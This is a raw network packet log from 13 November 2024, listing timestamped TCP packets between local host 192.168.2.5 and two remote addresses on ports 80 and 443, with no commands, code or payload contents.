Nov 13, 2024 20:39:23.943830013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.944258928 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.944288015 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.944320917 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.944355965 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.944391012 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:23.944434881 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.944434881 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.944436073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.944436073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:23.944436073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012372017 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012420893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012456894 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012491941 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012517929 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012553930 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012564898 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012587070 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012607098 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012613058 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012643099 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012659073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012677908 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012698889 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012712955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012722969 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012751102 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.012765884 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.012805939 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.013151884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.013205051 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.013207912 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.013241053 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.013257027 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.013276100 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.013295889 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.013313055 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.013330936 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.013366938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.060700893 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060741901 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060776949 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060812950 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060830116 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.060859919 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.060868979 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060889006 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.060899973 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060918093 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.060935974 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060946941 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.060971975 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.060988903 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.061007023 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.061028004 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.061042070 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.061053991 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.061079025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.061094999 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.061127901 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145051003 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145087957 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145117998 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145123959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145159006 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145165920 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145167112 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145195961 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145206928 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145231009 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145246983 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145267010 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145277977 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145303965 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145322084 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145345926 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145353079 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145399094 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145409107 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145443916 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145451069 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145477057 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145492077 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145513058 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145526886 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145550013 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.145562887 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.145600080 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.147089958 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.147156000 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.154351950 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.159394026 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.160976887 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.160998106 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.164280891 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.164289951 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.167253017 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.167583942 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.170902014 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.170945883 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.171272993 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.171286106 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.173916101 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.173928022 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.174264908 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.174271107 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.177318096 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177376032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177407026 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177412987 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177438974 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177442074 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177459955 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177476883 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177489996 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177511930 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177529097 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177558899 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177850008 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177901983 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177903891 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177938938 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177952051 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.177973986 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.177989960 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.178011894 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.178029060 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.178057909 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.178466082 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.178495884 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.178534031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.178534031 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.180444002 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.180459976 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.183928013 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.183938026 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.262253046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262348890 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262387991 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262397051 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262398005 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262423992 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262459993 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262466908 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262466908 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262495041 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262516022 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262545109 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262553930 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262603998 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262614012 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262650967 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262661934 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262686968 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262697935 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262722015 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262737989 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262763023 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262775898 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262799025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.262814045 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.262844086 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.263365030 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.263396025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.263420105 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.263444901 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.289036036 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.289547920 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.289623022 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.290002108 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.290036917 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.290051937 CET	49728	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.290060043 CET	443	49728	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.294301033 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294337034 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294373035 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294382095 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294382095 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294425964 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294446945 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294461966 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294469118 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294497967 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294507027 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294549942 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294759989 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294795036 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294810057 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294831038 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294838905 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294866085 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.294881105 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.294912100 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.295231104 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.295260906 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.295283079 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.295310974 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.299731970 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.299815893 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.299877882 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.299900055 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.299942017 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.299982071 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.300025940 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.300626993 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.300681114 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.300729036 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.300741911 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.300780058 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.300816059 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.300858021 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.302690029 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.302723885 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.302781105 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.303056002 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.303056002 CET	49727	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.303066969 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.303078890 CET	443	49727	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.304198980 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.304215908 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.304229975 CET	49724	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.304235935 CET	443	49724	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.308433056 CET	49730	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.308450937 CET	443	49730	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.311019897 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.311069965 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.311127901 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.311191082 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.311234951 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.311290979 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.313416958 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.313761950 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.313776970 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.314147949 CET	49725	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.314155102 CET	443	49725	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.314939976 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.315002918 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.315074921 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.315246105 CET	49731	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.315263987 CET	443	49731	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.315397978 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.315398932 CET	49726	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.315422058 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.315443993 CET	443	49726	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.335979939 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.336019039 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.336055040 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.336117029 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.336163044 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.361196041 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.361248970 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.361310959 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.361835957 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.361934900 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.362018108 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.362484932 CET	49732	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.362512112 CET	443	49732	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.362723112 CET	49733	443	192.168.2.5	13.107.246.45
Nov 13, 2024 20:39:24.362755060 CET	443	49733	13.107.246.45	192.168.2.5
Nov 13, 2024 20:39:24.378946066 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.378983021 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379019022 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379054070 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379107952 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379142046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379153013 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379194021 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379266024 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379302025 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379311085 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379348993 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379354954 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379388094 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379391909 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379426956 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379755020 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379790068 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379806042 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379823923 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.379831076 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.379865885 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.380095005 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.380125046 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.380143881 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.380167007 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411499977 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411556959 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411596060 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411609888 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411629915 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411631107 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411643982 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411668062 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411669970 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411704063 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411708117 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411740065 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411741972 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411781073 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411782026 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411819935 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411822081 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411855936 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411860943 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411891937 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411894083 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411927938 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.411931992 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.411964893 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.412241936 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.412271976 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.412281990 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.412311077 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.452545881 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.452600002 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.452637911 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.452644110 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.452665091 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.452680111 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.495846987 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.495893955 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.495934963 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.495949984 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.495950937 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.495985031 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.495986938 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496021032 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496022940 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496052980 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496081114 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496114016 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496114969 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496148109 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496150970 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496181011 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496186018 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496208906 CET	49720	80	192.168.2.5	185.215.113.206
Nov 13, 2024 20:39:24.496539116 CET	80	49720	185.215.113.206	192.168.2.5
Nov 13, 2024 20:39:24.496571064 CET	49720	80	192.168.2.5	185.215.113.206
